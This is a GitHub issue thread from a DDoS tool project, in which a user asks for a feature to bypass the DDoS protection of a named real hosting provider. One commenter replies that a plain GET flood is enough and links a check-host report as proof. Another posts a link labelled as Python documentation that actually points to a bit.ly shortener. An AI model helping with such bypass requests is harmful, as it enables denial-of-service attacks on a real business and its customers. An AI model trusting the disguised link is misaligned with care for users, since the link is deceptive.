### ISSUE TITLE
Add bypass superhosting pls

### ISSUE THREAD

**Issue by Ki4o112** [MHProDev/MHDDoS#77]
Can you add bypass https://www.superhosting.bg/ this ddos protection its very important. Thank you!

**Comment by SudoLite** [comment]
**You dont need to bypass this**
**Check This Link!!!**

**Method:** `GET`
https://check-host.net/check-report/75fe475k2e5

**Comment by fnnzzz** [comment]
Solution: [https://docs.python.org/kolm](bit.ly/3hEbSpG)
